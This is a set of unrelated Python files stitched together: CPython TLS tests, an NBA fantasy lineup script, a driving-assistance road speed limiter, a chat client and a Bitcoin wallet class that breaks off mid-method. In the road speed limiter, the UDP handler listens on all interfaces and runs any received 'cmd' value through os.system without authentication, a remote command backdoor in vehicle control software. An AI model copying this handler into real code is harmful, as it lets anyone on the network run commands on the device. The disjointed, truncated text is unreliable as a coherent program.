client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8466, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.FlagEnum, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.FlagEnum, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
lineups.py
|
#!./../../tools/python/bin/python
import os
import sys
from datetime import datetime
import queue
import threading
import time
def processLinueups():
while 1:
time.sleep(2)
print('hi'+str(a))
def __init__(self):
pass
def conditions():
return True
if __name__ == '__main__':
a = 67895
w = threading.Thread(name='processLinueups', target=processLinueups)
w.start()
dt = datetime.now()
dt = '_'.join([str(dt.hour), str(dt.minute), str(dt.second), str(dt.microsecond)[0:2]])
with open('/media/vishnu/Elements/CodingEnv/data/nba/20170930/FanDuel-NBA-21220-211645586_out.csv', 'r') as file:
data = file.read().split('\n')
data = [[y.replace('"', '') for y in x.split(',')] for x in data if x != '']
header = {k: v for v, k in enumerate(data[0])}
del data[0]
data = [[x[header['Id']], x[header['Position']], x[header['Name']], int(x[header['Salary']]),
float(x[header['Points']]), x[header['Team']], x[header['Include']]] for x in data]
header = {'Id':0, 'Position':1, 'Name':2, 'Salary':3, 'Points':4, 'Team':5, 'Include':6 }
#limit = 150
params = {'lineupsLimit': 150, 'maxMatchingPlayers':7, 'site': 'FD'}
posSelect = {'PF':[], 'SF':[], 'PG':[], 'SG':[], 'C':[], 'G':[], 'F':[], 'UTIL':[]}
positions = {}
salary = {}
points = {}
name = {}
team = {}
lineup = set()
lineups = []
#sorting the players based on points
data = sorted(data, key=lambda x: x[header['Points']], reverse=True)
for i in range(0, len(data)):
if data[i][header['Include']] == 'y':
#appending positions
pos = data[i][header['Position']].split('/')
for val in pos:
if val in posSelect.keys():
posSelect[val].append(data[i][header['Id']])
if val in ['SF', 'PF']:
posSelect['F'].append(data[i][header['Id']])
if val in ['PG', 'SG']:
posSelect['G'].append(data[i][header['Id']])
posSelect['UTIL'].append(data[i][header['Id']])
#getting player position
positions[data[i][header['Id']]] = pos
#getting salary
salary[data[i][header['Id']]] = data[i][header['Salary']]
#getting points
points[data[i][header['Id']]] = data[i][header['Points']]
# getting points
name[data[i][header['Id']]] = data[i][header['Name']]
# getting points
team[data[i][header['Id']]] = data[i][header['Team']]
if params["site"] == "FD":
pass
while 1:
time.sleep(2)
print('yo'+str(a))
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp, clip
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.start_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
v_limit = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - cam_limit_speed
v_diff = v_ego - v_limit
if self.longcontrol:
sec = interp(v_diff, [2.7, 8.3], [15., 20.])
else:
sec = interp(v_diff, [2.7, 8.3], [17., 23.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
if __name__ == "__main__":
main()
|
client.py
|
from network import Handler, poll
import sys
from threading import Thread
from time import sleep
myname = raw_input('What is your name? ')
class Client(Handler):
def on_close(self):
pass
def on_msg(self, msg):
print msg
host, port = 'localhost', 8888
client = Client(host, port)
client.do_send({'join': myname})
def periodic_poll():
while 1:
poll()
sleep(0.05) # seconds
thread = Thread(target=periodic_poll)
thread.daemon = True # die when the main thread dies
thread.start()
while 1:
mytxt = sys.stdin.readline().rstrip()
client.do_send({'speak': myname, 'txt': mytxt})
|
wallet.py
|
import copy, hashlib, json, logging, os
from time import time
from hwilib.descriptor import AddChecksum
from .device import Device
from .key import Key
from .helpers import decode_base58, der_to_bytes, get_xpub_fingerprint, sort_descriptor, fslock, parse_utxo
from hwilib.serializations import PSBT, CTransaction
from io import BytesIO
from .specter_error import SpecterError
import threading
# a gap of 20 addresses is what many wallets do
WALLET_CHUNK = 20
wallet_tx_batch = 100
class Wallet():
def __init__(
self,
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=False,
last_block=None,
):
self.name = name
self.alias = alias
self.description = description
self.address_type = address_type
self.address = address
self.address_index = address_index
self.change_address = change_address
self.change_index = change_index
self.keypool = keypool
self.change_keypool = change_keypool
self.recv_descriptor = recv_descriptor
self.change_descriptor = change_descriptor
self.keys = keys
self.devices = [
(
device
if isinstance(device, Device)
else device_manager.get_by_alias(device)
)
for device in devices
]
if None in self.devices:
raise Exception(
'A device used by this wallet could not have been found!'
)
self.sigs_required = sigs_required
self.pending_psbts = pending_psbts
self.fullpath = fullpath
self.manager = manager
self.cli = self.manager.cli.wallet(
os.path.join(self.manager.cli_path, self.alias)
)
self.last_block = last_block
if address == '':
self.getnewaddress()
if change_address == '':
self.getnewaddress(change=True)
self.getdata()
self.update()
if old_format_detected or self.last_block != last_block:
self.save_to_file()
def update(self):
self.get_balance()
self.check_addresses()
self.get_info()
def check_addresses(self):
"""Checking the gap limit is still ok"""
if self.last_block is None:
obj = self.cli.listsinceblock()
txs = obj["transactions"]
last_block = obj["lastblock"]
else:
obj = self.cli.listsinceblock(self.last_block)
txs = obj["transactions"]
last_block = obj["lastblock"]
addresses = [tx["address"] for tx in txs]
# remove duplicates
addresses = list(dict.fromkeys(addresses))
if len(addresses) > 0:
# prepare rpc call
calls = [("getaddressinfo",addr) for addr in addresses]
# extract results
res = [r["result"] for r in self.cli.multi(calls)]
# extract last two indexes of hdkeypath
paths = [d["hdkeypath"].split("/")[-2:] for d in res if "hdkeypath" in d]
# get change and recv addresses
max_recv = max([int(p[1]) for p in paths if p[0]=="0"], default=-1)
max_change = max([int(p[1]) for p in paths if p[0]=="1"], default=-1)
# these calls will happen only if current addresses are used
while max_recv >= self.address_index:
self.getnewaddress(change=False)
while max_change >= self.change_index:
self.getnewaddress(change=True)
self.last_block = last_block
@staticmethod
def parse_old_format(wallet_dict, device_manager):
old_format_detected = False
new_dict = {}
new_dict.update(wallet_dict)
if 'key' in wallet_dict:
new_dict['keys'] = [wallet_dict['key']]
del new_dict['key']
old_format_detected = True
if 'device' in wallet_dict:
new_dict['devices'] = [wallet_dict['device']]
del new_dict['device']
old_format_detected = True
devices = [device_manager.get_by_alias(device) for device in new_dict['devices']]
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['recv_descriptor']:
new_dict['recv_descriptor'] = AddChecksum(new_dict['recv_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['change_descriptor']:
new_dict['change_descriptor'] = AddChecksum(new_dict['change_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if None in devices:
devices = [((device['name'] if isinstance(device, dict) else device) if (device['name'] if isinstance(device, dict) else device) in device_manager.devices else None) for device in new_dict['devices']]
if None in devices:
raise Exception('A device used by this wallet could not have been found!')
else:
new_dict['devices'] = [device_manager.devices[device].alias for device in devices]
old_format_detected = True
new_dict['old_format_detected'] = old_format_detected
return new_dict
@classmethod
def from_json(cls, wallet_dict, device_manager, manager, default_alias='', default_fullpath=''):
name = wallet_dict['name'] if 'name' in wallet_dict else ''
alias = wallet_dict['alias'] if 'alias' in wallet_dict else default_alias
description = wallet_dict['description'] if 'description' in wallet_dict else ''
address = wallet_dict['address'] if 'address' in wallet_dict else ''
address_index = wallet_dict['address_index'] if 'address_index' in wallet_dict else 0
change_address = wallet_dict['change_address'] if 'change_address' in wallet_dict else ''
change_index = wallet_dict['change_index'] if 'change_index' in wallet_dict else 0
keypool = wallet_dict['keypool'] if 'keypool' in wallet_dict else 0
change_keypool = wallet_dict['change_keypool'] if 'change_keypool' in wallet_dict else 0
sigs_required = wallet_dict['sigs_required'] if 'sigs_required' in wallet_dict else 1
pending_psbts = wallet_dict['pending_psbts'] if 'pending_psbts' in wallet_dict else {}
fullpath = wallet_dict['fullpath'] if 'fullpath' in wallet_dict else default_fullpath
last_block = wallet_dict['last_block'] if 'last_block' in wallet_dict else None
wallet_dict = Wallet.parse_old_format(wallet_dict, device_manager)
try:
address_type = wallet_dict['address_type']
recv_descriptor = wallet_dict['recv_descriptor']
change_descriptor = wallet_dict['change_descriptor']
keys = [Key.from_json(key_dict) for key_dict in wallet_dict['keys']]
devices = wallet_dict['devices']
except:
Exception('Could not construct a Wallet object from the data provided.')
return cls(
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=wallet_dict['old_format_detected'],
last_block=last_block
)
def get_info(self):
try:
self.info = self.cli.getwalletinfo()
except Exception:
self.info = {}
def getdata(self):
try:
self.utxo = parse_utxo(self, self.cli.listunspent(0))
except Exception:
self.utxo = []
self.get_info()
# TODO: Should do the same for the non change address (?)
# check if address was used already
try:
value_on_address = self.cli.getreceivedbyaddress(
self.change_address,
0
)
except:
# Could happen if address not in wallet (wallet was imported)
# try adding keypool
self.keypoolrefill(0, end=self.keypool, change=False)
self.keypoolrefill(0, end=self.change_keypool, change=True)
value_on_address = 0
# if not - just return
if value_on_address > 0:
self.change_index += 1
self.getnewaddress(change=True)
@property
def json(self):
return {
"name": self.name,
"alias": self.alias,
"description": self.description,
"address_type": self.address_type,
"address": self.address,
"address_index": self.address_index,
"change_address": self.change_address,
"change_index": self.change_index,
"keypool": self.keypool,
"change_keypool": self.change_keypool,
"recv_descriptor": self.recv_descriptor,
"change_descriptor": self.change_descriptor,
"keys": [key.json for key in self.keys],
"devices": [device.alias for device in self.devices],
"sigs_required": self.sigs_required,
"pending_psbts": self.pending_psbts,
"fullpath": self.fullpath,
"last_block": self.last_block,
"blockheight": self.blockheight
}
def save_to_file(self):
with fslock:
with open(self.fullpath, "w+") as f:
f.write(json.dumps(self.json, indent=4))
self.manager.update()
@property
def is_multisig(self):
return len(self.keys) > 1
@property
def locked_amount(self):
amount = 0
for psbt in self.pending_psbts:
amount += sum([utxo["witness_utxo"]["amount"] for utxo in self.pending_psbts[psbt]["inputs"]])
return amount
def delete_pending_psbt(self, txid):
try:
